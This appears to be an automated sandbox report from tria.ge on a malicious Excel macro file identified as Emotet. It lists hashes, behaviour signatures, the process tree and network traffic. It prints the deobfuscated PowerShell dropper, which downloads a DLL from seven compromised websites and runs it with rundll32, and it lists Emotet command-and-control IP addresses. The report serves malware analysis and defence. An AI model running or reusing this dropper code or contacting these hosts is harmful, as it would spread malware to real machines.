Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
24/11/2021, 17:59 UTC
211124-wk8rgsddbm 1022/11/2021, 14:46 UTC
211122-r5n6csagd6 1022/11/2021, 14:46 UTC
211122-r5csbsfgdp 1022/11/2021, 14:44 UTC
211122-r4kfsafgdn 1022/11/2021, 14:41 UTC
211122-r2x9vsfgcq 1022/11/2021, 14:20 UTC
211122-rneklaffgr 1022/11/2021, 14:15 UTC
211122-rkk8zaffgl 1017/11/2021, 06:51 UTC
211117-hm1l1aeefm 1017/11/2021, 06:37 UTC
211117-hdnk3seedn 10Analysis
-
max time kernel
21s -
max time network
21s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
22/11/2021, 14:46 UTC
General
-
Target
865663204559_17_Nov_2021.xlsm
-
Size
44KB
-
MD5
477fd718bb764ffe3c5afde16c6c8dd2
-
SHA1
eb932e19d95f88d64270d40cdc0b92c6d1cf63be
-
SHA256
ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3
-
SHA512
f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
1
$dfkj = $strs = "https://evgeniys.ru/sap-logs/D6/", "http://crownadvertising.ca/wp-includes/OxiAACCoic/", "https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/", "http://immoinvest.com.br/blog_old/wp-admin/luoT/", "https://yoho.love/wp-content/e4laFBDXIvYT6O/", "https://www.168801.xyz/wp-content/6J3CV4meLxvZP/", "https://www.pasionportufuturo.pe/wp-content/XUBS/"
2
foreach ($st in $strs) {
3
$r1 = get-random
4
$r2 = get-random
5
$tpth = "C:\\ProgramData\\\\" + $r1 + ".dll"
6
invoke-webrequest -uri $st -outfile $tpth
7
if (test-path $tpth) {
8
$fp = "C:\\Windows\\SysWow64\\rundll32.exe"
9
$a = $tpth + ",f" + $r2
10
start-process "C:\\Windows\\SysWow64\\rundll32.exe" -argumentlist $a
11
break
12
}
13
}
14
invoke-expression $dfkj
15
URLs
exe.dropper
https://evgeniys.ru/sap-logs/D6/
exe.dropper
http://crownadvertising.ca/wp-includes/OxiAACCoic/
exe.dropper
https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/
exe.dropper
http://immoinvest.com.br/blog_old/wp-admin/luoT/
exe.dropper
https://yoho.love/wp-content/e4laFBDXIvYT6O/
exe.dropper
https://www.168801.xyz/wp-content/6J3CV4meLxvZP/
exe.dropper
https://www.pasionportufuturo.pe/wp-content/XUBS/
Extracted
Family
emotet
Botnet
Epoch4
C2
91.200.186.228:443
191.252.196.221:8080
94.177.248.64:443
66.42.55.5:7080
103.8.26.103:8080
185.184.25.237:8080
103.8.26.102:8080
178.79.147.66:8080
58.227.42.236:80
45.118.135.203:7080
103.75.201.2:443
195.154.133.20:443
45.142.114.231:8080
212.237.5.209:443
207.38.84.195:8080
104.251.214.46:8080
212.237.17.99:8080
212.237.56.116:7080
216.158.226.206:443
110.232.117.186:8080
eck1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
3
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
4
-----END PUBLIC KEY-----
ecs1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
3
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
4
-----END PUBLIC KEY-----
Signatures
-
Emotet
Emotet is a trojan that is primarily spread through spam emails.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
-
Drops file in System32 directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\rundll32.exe"C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\2082074918.dll,f2568762904⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\2082074918.dll",Control_RunDLL5⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bxachutoyjs\unzedrunujmobju.rov",QnYEvEaWkGYXF6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bxachutoyjs\unzedrunujmobju.rov",Control_RunDLL7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
-
Network
-
DNStime.windows.comRemote address:8.8.8.8:53Requesttime.windows.comIN AResponsetime.windows.comIN CNAMEtwc.trafficmanager.nettwc.trafficmanager.netIN A40.119.148.38 -
DNSevgeniys.ruRemote address:8.8.8.8:53Requestevgeniys.ruIN AResponseevgeniys.ruIN A159.253.18.185
-
DNScrownadvertising.caRemote address:8.8.8.8:53Requestcrownadvertising.caIN AResponsecrownadvertising.caIN A209.124.90.7
-
GEThttp://crownadvertising.ca/wp-includes/OxiAACCoic/Remote address:209.124.90.7:80RequestGET /wp-includes/OxiAACCoic/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
Host: crownadvertising.ca
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 22 Nov 2021 14:52:51 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Mon, 22 Nov 2021 14:52:51 GMT
Content-Disposition: attachment; filename="aoSbYZ.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 619baec372a01=1637592771; expires=Mon, 22-Nov-2021 14:53:51 GMT; Max-Age=60; path=/
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 22 Nov 2021 14:52:51 GMT
Keep-Alive: timeout=5, max=100
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
-
GEThttps://91.200.186.228/YqsbUCnLRVkcHeuRemote address:91.200.186.228:443RequestGET /YqsbUCnLRVkcHeu HTTP/1.1
Cookie: CHeeBoZsSXJd=D2SVt9gbcJ2TNRE279N5LPJT41jGL11LYgJx07BajJldlUc5+W/yQGRsI3wl+tjiJ6nuwYuPWTkPAlLFqSJvlK9a7Q0tC8LVdmtksORbgViB+IEt3Am1ZGtIMvkAMGOAd0kLjGyJwydfR9TbAnEIjFRazN9AJhHg0TuI1glUGsVBW0VallnnvdzHYMpFeHl6O/M11V9P2gkjgQTjw9Se8ADDGQ/gyf+/kapZ4cMJYyH+wjgUUMWR6ZHj
Host: 91.200.186.228
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Nov 2021 14:46:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
52.109.8.20:443
-
159.253.18.185:443evgeniys.rutls -
209.124.90.7:80http://crownadvertising.ca/wp-includes/OxiAACCoic/http
HTTP Request
GET http://crownadvertising.ca/wp-includes/OxiAACCoic/HTTP Response
200 -
91.200.186.228:443https://91.200.186.228/YqsbUCnLRVkcHeutls, http
HTTP Request
GET https://91.200.186.228/YqsbUCnLRVkcHeuHTTP Response
200
-
8.8.8.8:53time.windows.comdns
DNS Request
time.windows.com
DNS Response
40.119.148.38
-
40.119.148.38:123time.windows.comntp -
8.8.8.8:53evgeniys.rudns
DNS Request
evgeniys.ru
DNS Response
159.253.18.185
-
8.8.8.8:53crownadvertising.cadns
DNS Request
crownadvertising.ca
DNS Response
209.124.90.7
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
160KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB